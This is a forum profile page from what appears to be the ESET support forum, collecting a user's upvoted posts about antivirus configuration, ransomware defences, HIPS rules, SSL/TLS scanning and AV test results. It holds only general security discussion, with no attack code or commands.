Jump to content

itman

Most Valued Members
  • Content Count

    4,943
  • Joined

  • Last visited

  • Days Won

    150

Kudos

  1. Upvote
    itman received kudos from fabioquadros_ in Ransomware   
    Most of the dedicated anti-ransomware solutions do the same. BTW - Checkpoint has an excellent anti-ransomware solution that costs around $15 USD w/yearly subscription.
    I believe Kaspersky also works the same way. In addition if its System Watcher feature is enabled, it will use a snapshot to restore any files encrypted prior to its ransomware detection mechanism kicking in.
    As far as Eset goes, your best solution is to create HIPS rules to monitor file modification activities against any of your User folders. This really shouldn't be too much of an inconvenience for the average user since those directories are not updated that frequently in normal daily use. For business environments, process exceptions would have to be created increasing the risk of ramsonware succeeding due to malware modification of those processes.
  2. Upvote
    itman received kudos from wraith in Ransomware   
    One nasty ransomware. It's disguised to appear to be a .pdf file using the xxxxx.pdf.exe naming convention.
    Appears to be one of these dreaded compile on the fly .Net .dll malware buggers and then inject that .dll into legit process. Hook a thread to the .dll and we're off and running encryption wise.
    I would say the major complaint Eset-wise is why it didn't have a sig. for this when 37 other VT vendors did.
    Notice how it targeted WD and Malwarbytes via legit Net process use?
    Will say that this sample is a perfect example of why Eset needs "block-at-first-sight" capability; not just for Enterprise subscribers of EED.
  3. Upvote
    itman received kudos from howardagoldberg in HTTPS Monitoring   
    This is also worth a read and very much indicates that what Avast/AVG is doing is something Google doesn't approve of:
    https://techdows.com/2019/08/chrome-you-are-using-an-unsupported-environment-variable-sslkeylogfile.html
  4. Upvote
    itman received kudos from howardagoldberg in HTTPS Monitoring   
    Interesting article. I checked the environment variables for FireFox; I don't use Chrome, and Eset does not use or need to use this baloney.
    Both Avast and Kaspersky were having issues with use of their root CA certificates in Chrome a while back to decrypt SSL/TLS traffic. Appears this is Avast's solution to the problem and a very insecure one at that.
  5. Upvote
    itman received kudos from Bigk in Duplicate IP Addresses on the network   
    The Eset firewall doesn't recognize the APIPA: https://www.pcmag.com/encyclopedia/term/37858/apipa assigned address range; i.e. 169.254.xxx.xxx. Personally, I think its a bug.
    In any case if the router or gateway is assigning APIPA addresses to devices, it is indicative of a problem with the DHCP server.
  6. Upvote
    itman received kudos from Rami in CamScanner detected as trojan downloader (ESET Mobile)   
    Kaspersky just published an analysis on CamScanner:
    https://securelist.com/dropper-in-google-play/92496/
  7. Upvote
    itman received kudos from howardagoldberg in ESET issue with Sandboxie - Persistent holding of registry keys   
    My cleaner module ver. is currently 1195 dated 6/10. I could have swore that it had been previously updated to 1198.
    Check what ver. your cleaner module is. If its not 1198, you will have to switch to pre-release updates to get it.
  8. Upvote
    itman received kudos from Farah in The Rise of “Bulletproof” Residential Networks   
    An absolutely fascinating article:
    https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/
  9. Upvote
    itman received kudos from Aryeh Goretsky in AV-TEST and ESET   
    As far as AV labs tests go, they have to be scrutinized for discrepancies. For example, on the latest comparative from A-V Comparatives, Windows Defender had an unusually high false positive rate using a much smaller malware sample size. Whereas on the latest AV-Test business test, WD had a low FP rate for a much larger malware sample size.
    Bottom line - take AV lab test results as a rough approximation in regards to a security solutions real world malware performance. Also always review as many test reports as you can from different AV labs and again, look for discrepancies.
  10. Upvote
    itman received kudos from Azure Phoenix in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Microsoft added Tamper Protection in Win 10 1903. Oddly, it has to be manually enabled.
    I keep looking for a published bypass if it, but so far so good for Microsoft. It also appears to "have held its own" against the latest and greatest version of Trickbot which tried its darnedest to disable it:
    https://www.bleepingcomputer.com/news/security/new-trickbot-version-focuses-on-microsofts-windows-defender/
    Such can not be said for MalwareBytes or Sophos.
  11. Upvote
    itman received kudos from twm in Eset Blocking Chromecast   
    Well, I guess we have "come full circle" on this discussion. So let's summarize the options:
    1. Local Chromecast dongle IP address exclusion. The Kaspersky article implies multiple addresses might be needed. Don't know fully what that is about but could imply router dynamic address assignment. Therefore static address assignment would be required as previously posted.
    2. Exclude port 8009 from SSL/TLS protocol scanning. No qualms with this one since it wasn't being previously scanned. I also believe other ports might need exclusion but "time will tell" on that one.
    My own thoughts on this issue is the whole subject of allowing an IoT device direct access to your PC. But that's another separate topic discussion.
    A footnote comment. Eset has "opened Pandora's Box" in regards to future issues in regards to performing SSL/TLS scanning of all ports. I for one, will avoid assistance on any of those issues.
  12. Upvote
    itman gave kudos to rsternap in Eset Blocking Chromecast   
    Try the help page here under 'problem accessing a device on your network'
    https://help.eset.com/ees/7/en-US/solving_problems_protocol_filtering.html
    adding the chromecast ip address to the exclude list worked for me.
    Find the address in google home app - tap the icon for your chromecast device, tap settings (gear symbol), scroll down to information
  13. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add option to realtime scanner to block obfuscated Powershell scripts. Option would be dependent upon Win 10 AMSI option enabled in the Eset GUI.
    Justification
    Microsoft added a like mitigation in the form of a Windows Defender Exploit Guard ASR mitigation effective with Win 10 1709. ASR mitigations are only effective if Windows Defender is enabled as the realtime scan engine.
    Further justification is Eset's failure to detect malware in highly obfuscated PowerShell script in a Malware Research Group ad hoc test: https://www.mrg-effitas.com/research/current-state-of-malicious-powershell-script-blocking/
  14. Upvote
    itman received kudos from Azure Phoenix in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add option to realtime scanner to block obfuscated Powershell scripts. Option would be dependent upon Win 10 AMSI option enabled in the Eset GUI.
    Justification
    Microsoft added a like mitigation in the form of a Windows Defender Exploit Guard ASR mitigation effective with Win 10 1709. ASR mitigations are only effective if Windows Defender is enabled as the realtime scan engine.
    Further justification is Eset's failure to detect malware in highly obfuscated PowerShell script in a Malware Research Group ad hoc test: https://www.mrg-effitas.com/research/current-state-of-malicious-powershell-script-blocking/
  15. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add a column showing PID number in the following logs after the noted existing log column headings:
    1. HIPS - Application
    2. Network - Source
    This is necessary to properly identify the origin for multiple same process occurrences such as svchost.exe. 
  16. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    It actually used to do this prior to ver. 11. I believe this has something to do with Microsoft's decree to AV vendors that they can't interfere with the boot process in Win 10 ver. 1709. I am actually surprised that Eset even processes an Ask HIPS use in ver. 11 and instead, just auto allows it. I know it is doing so because it will slightly delay your boot time; something I though wasn't supposed to happen on Win 10 ver. 1709.
    Again it is a bit peculiar that the HIPS default action is allow. However, it always has been this way. To be honest, I seriously doubt Eset will change it to block mode.
    A proper frame of reference for you is Eset first and foremost created the HIPS for its own internal use. As such, it really isn't designed to be user configurable other than to create a few exception rules. This is more so evident in the retail vers. of Eset. For example, Eset added file wildcard capability a while back for the Endpoint vers. but refuses to do so for the retail vers..
  17. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I explained this once to you. Eset has internal default rules and those rules take precedence to any user created rules.
    Also if an alert response is not received within a short period of time, Eset will auto allow the action. This comes into play for example with any ask rule that might be triggered during the boot process. Those will be allowed by the time the PC initializes, the desktop appears, and finally the Eset GUI is started. 
  18. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Nvidia in their "infinite security wisdom" created two .bat scripts they dumped in C:\Windows directory. Their startup service can run these .bat scripts if errors are encountered in their software as recovery procedures. So basically, you have to allow svchost.exe to run cmd.exe. Not the most secure thing to do if malware creates a malicious service. Hence my recommendation that file wildcard support is needed.
    There is also the issue of why the HIPS hasn't been updated to reflect Win 10's current ability to uniquely identify an individual svchost.exe service by process id. 
  19. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Yeah, I know about this.
    Just be careful with GitHub software. Being open source, it can be hacked. One of the major sources of nasty backdoors has been GitHub software.
  20. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    As far as anti-exec processing, there is a one built into Win 10 - native SmartScreen. I have tested with a couple of unknown reputation files and each time got an alert from it when they tried to run. Eset let the files run w/o issue. Neither file was malicious but I prefer an option to disallow execution in this instance.
    The downside is native SmartScreen relies on "The Mark of the Web" remaining associated with the downloaded file. There are ways to "strip that off" of a download.
  21. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I did some of my own testing in regards to this business about the HIPS not detecting Farber activity. For starters, I set the HIPS to Interactive mode and then ran Farbar.
    To begin with, Farbar will load and begin execution because you started it manually. However, the first attempt by Farbar to perform any activity the HIPS monitors for will cause an alert as shown by the below screen shot.
    Now if you create a .bat script and run Farbar by execution of the script, you will receive a HIPS alert about the startup of Farbar. Likewise, malware doesn't magically run by itself. Something has to execute it. 

  22. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I have run Farbar in the past and Eset HIPS in Auto or Safe mode will not alert because its a safe app.
    Are you saying that the HIPS in Interactive or Policy mode is not throwing an alert at Farber startup time?
  23. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    You will need to show an example of an .exe that Eset HIPS did not detect running in Interactive mode. The only way I know that could occur is if you inadvertently created an allow rule while running in Training mode or by manual creation. 
    One possibility for example is that an allow rule was created for a process to start another process. If the allow rule did not specifically state what process start up was allowed, then Eset will allow any child process startup from the parent process.
×
×
  • Create New...